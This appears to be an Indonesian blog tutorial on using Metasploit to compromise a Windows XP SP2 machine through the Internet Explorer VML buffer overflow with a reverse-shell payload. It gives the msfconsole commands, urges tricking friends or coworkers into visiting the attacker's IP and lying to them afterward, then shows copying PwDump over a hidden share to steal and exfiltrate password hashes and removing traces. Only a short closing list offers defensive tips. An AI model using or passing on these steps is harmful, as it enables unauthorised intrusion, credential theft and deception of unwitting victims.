Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.


msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit


Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.



Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’.
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1


Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..



Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

GUEST BOOK

 
Powered By Blogger

submit to reddit